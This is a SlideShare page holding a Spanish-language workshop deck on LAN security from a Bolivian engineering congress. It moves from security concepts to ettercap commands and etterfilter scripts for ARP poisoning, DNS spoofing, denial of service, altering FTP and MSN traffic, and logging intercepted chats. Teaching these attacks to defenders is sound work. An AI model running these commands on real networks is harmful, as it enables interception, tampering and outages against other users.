Seguridad de redes (congreso)

1,934 views
1,779 views

Published on

Taller brindado en la Universidad Privada de Bolivia.
Seguridad en redes LAN

Published in: News & Politics, Technology
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total views
1,934
On SlideShare
0
From Embeds
0
Number of Embeds
20
Actions
Shares
0
Downloads
108
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

Seguridad de redes (congreso)

  1. 1. III Congreso Boliviano <br />de Ingeniería y Tecnología<br />Seguridad en redes<br />Ing. Jorge Orellana Araoz<br />Docente Investigador MEMI-UMSS<br />Univ. Gonzalo Nina<br />Auxiliar Centro MEMI-UMSS<br />
  2. 2. Seguridad<br />La seguridad de las redes es una parte integral de las redes informáticas. Incluye protocolos, tecnologías, dispositivos, herramientas y técnicas que aseguran los datos y reducen las amenazas. <br />La mayor motivación de la seguridad en redes es el esfuerzo por mantenerse un paso más adelante de los hackers malintencionados. Del mismo modo que los médicos intentan prevenir nuevas enfermedades tratando problemas existentes, los profesionales de la seguridad en redes intentan prevenir ataques minimizando los efectos de los ataques en tiempo real. <br />2<br />
  3. 3. Seguridad<br />
  4. 4. Confidencialidad<br />Integridad<br />Disponibilidad<br />Propiedades de la SeguridadInformatica<br />
  5. 5. Procesamiento<br />Almacenamiento<br />Transmision<br />Estados de la Informacion<br />
  6. 6. Politicas y Procedimientos<br />Tecnologia<br />Educacion, Entrenamiento, y Conocimiento<br />Medidas de Seguridad<br />
  7. 7. Procesamiento<br />Almacenamiento<br />Transmision<br />Confidencialidad<br />Integridad<br />Disponibilidad<br />Politicas y Procedimientos<br />Tecnologia<br />Educacion, Entrenamiento, y Conocimiento<br />Modelo de Seguridad de Informacion<br />
  8. 8. Administracion de Riesgos<br />El proceso de asegurar y cuantificar los riesgos hasta establecer un nivel aceptable de riesgo en la organización.<br />El riego puede ser mitigado, pero nunca eliminado.<br />
  9. 9. Amenazas a la Seguridad<br />9<br />Ataques de reconocimiento<br />Descubrimiento y mapeo de sistemas, servicios o vulnerabilidades sin autorización. <br />Ataques de acceso<br />Explotar vulnerabilidades conocidas en servicios de autenticación, FTP y web para ganar acceso a cuentas web, bases de datos confidenciales y otra información sensible. <br />Ataques de Denegación de Servicio<br />Envíar un número extremadamente grande de solicitudes en una red o Internet. Estas solicitudes excesivas hacen que la calidad de funcionamiento del dispositivo víctima sea inferior y no estar disponible para acceso y uso legítimo. <br />
  10. 10. Ataques de Reconocimiento<br />10<br /><ul><li>Sniffers de paquetes
  11. 11. Barridos de ping
  12. 12. Escaneo de puertos
  13. 13. Búsquedas de información en Internet </li></li></ul><li>Ataques de Acceso<br />11<br /><ul><li>Ataques de contraseña
  14. 14. Explotación de la confianza
  15. 15. Redirección de puerto
  16. 16. Ataque Man in theMiddle
  17. 17. Desbordamiento de buffer</li></li></ul><li>Ataques de DoS<br />12<br /><ul><li>SYN Flood Attack
  18. 18. Teardrop Attacks
  19. 19. Smurf Attack
  20. 20. DNS Attacks
  21. 21. Email Attacks
  22. 22. Physical Infrastructure Attacks
  23. 23. Viruses/Worms</li></li></ul><li>AtaquesEspecificos de Red<br />ARP Attack<br />Brute Force Attack<br />Worms<br />Flooding<br />Sniffers<br />Spoofing<br />Redirected Attacks<br />Tunneling Attack<br />Covert Channels<br />
  24. 24. Etapas de un ataque<br />Hoy en dia los atacantestienengrancantidad de blancos de ataque. Su grandesafioesseleccionarlasvictimasmasvulnerables. Para estorealizanataquesmuybienplaneados y estructurados. Estosataquestienenetapaslogisticas y estrategicascomunes:<br />Reconocimiento<br />Exploracion (direcciones, puertos, vulnerabilidades)<br />Ganaracceso<br />MantenerAcceso<br />CubrirPistas<br />
  25. 25. Contramedidas<br />DMZ/NAT<br />IDS/IPS<br />Content Filtering/NAC<br />Firewalls/proxy services<br />Authentication/Authorization/Accounting<br />Self-defending networks<br />Policies, procedures, standards guidelines<br />Training and awareness<br />
  26. 26. Ataques En Redes LAN<br />La seguridad en Redes LAN es muchas veces inexistente y para probarlo se describen los pasos necesarios para realizar algunos ataques en redes de area local. <br />Escenario Una red de area local (LAN) equipos interconectados mediante dispositivos de networking como ser concentradores (HUBs) o encaminadores (switch). El equipo atacante tiene que estar en la misma red que el equipo victima.<br />16<br />
  27. 27. Envenenamiento ARP<br /> Lanzar ataque:<br />root@bt#ettercap -T -q -i eth0 -M arp:remote MAC/IP/PUERTO MAC/IP/PUERTO<br />Donde:<br />- T : modo Texto<br />- q : quiet(No hace ruido) no muestra todo lo que captura solo lo importante.<br />- i : Eleccion de la interfaz<br />- M : Metodoarp<br />17<br />
  28. 28. Envenenamiento ARP<br />
  29. 29. Envenenamiento ARP<br />
  30. 30. Envenenamiento ARP<br />
  31. 31. Envenenamiento ARP<br />21<br />
  32. 32. Envenenamiento ARP<br />22<br />
  33. 33. Envenenamiento ARP<br />23<br />
  34. 34. Envenenamiento ARP<br />24<br />
  35. 35. DNS Spoof<br />1. Editar archivo de conguracion DNS<br />/usr/share/ettercap/etter.dns<br />dominio A direccion-ip<br />25<br />
  36. 36. DNS Spoof<br />2. Lanzar el Ataque: <br />root@bt#ettercap -T -q -i eth0 -P dnsspoof -M arp:remote MAC/IP/PUERTO MAC/IP/PUERTO<br /><ul><li>T : modo Texo
  37. 37. q : quiet(No hace ruido) no muestra todo lo que captura solo lo importante.
  38. 38. i : Eleccion de la interfaz
  39. 39. P : Activa el plugindnsspoof(previa conguracion)</li></ul>- M : Metodoarp<br />- P : Activa el plugindnsspoof<br />
  40. 40.
  41. 41. D.O.S Denial of Service -Denegacion de Servicio<br />1. Lanzar ataque:<br />root@bt#ettercap -T -q -i eth0 -P dos attack -M arp:remote MAC/IP/PUERTO MAC/IP/PUERTO<br />- T : modo Texo<br />- q : quiet(No hace ruido) no muestra todo lo que captura solo lo importante.<br />- i : Eleccion de la interfaz<br />- M : Metodoarp<br /><ul><li>P : Activa el plugin dos attack</li></ul>2. Asignar valores<br /> Insert victim IP: ip de la victima.<br />Insertunused IP: ip a donde direccionar el trafico.<br />28<br />
  42. 42.
  43. 43. Denegacion de Servicio<br />30<br />
  44. 44. Denegacion de Servicio<br />31<br />
  45. 45. Cambio de datos<br />1. Crear el filtro de cambio<br />Archivo banner<br />---------------------------------------------<br /># replace the FTP prompt por SSH<br />if (tcp.src == 21) {<br />replace("FTP","SSH");<br />}<br />---------------------------------------------<br />2. compilar:<br />root@bt#etterfilterbanner -o banner.ef<br />3. Ejecutar el filtro + envenamiento ARP<br />root@bt#ettercap -T -q -i eth0 -F banner.ef -M arp:remote MAC/IP/PUERTO MAC/IP/PUERTO<br />32<br />
  46. 46.
  47. 47. Alteracion de Conversaciones (Caso MSN Messenger)<br />1. Crear el filtro de cambio<br />Archivo msn<br />-------------------------------------------------<br />34<br />
  48. 48. Alteracion de Conversaciones(Caso MSN Messenger)<br />2. compilar:<br />root@bt#etterfiltermsn -o msn.ef<br />3. Ejecutar el filtro + envenamiento ARP<br />root@bt#ettercap -T -q -i eth0 -F msn.ef -M arp:remote MAC/IP/PUERTO MAC/IP/PUERTO<br />35<br />
  49. 49.
  50. 50. Grabar Chat<br />1. Crear el filtro de guardar conversaciones<br />Archivo ver chat<br />--------------------------------------------------<br />if (tcp.src == 1863 || tcp.dst == 1863) {<br />log(DATA.data, "/tmp/msn.log");<br />msg("Texto plano MSN Guardado!XDn");<br />}<br />--------------------------------------------------<br />37<br />
  51. 51. Grabar Chat<br />2. compilar:<br />root@bt#etterfilterverchar -o verchat.ef<br />3. Ejecutar el filtro + envenamiento ARP<br />root@bt#ettercap -T -q -i eth0 -F verchat.ef -M arp:remote MAC/IP/PUERTO MAC/IP/PUERTO<br />4. Revisar el archivo /tmp/msn.log<br />38<br />

×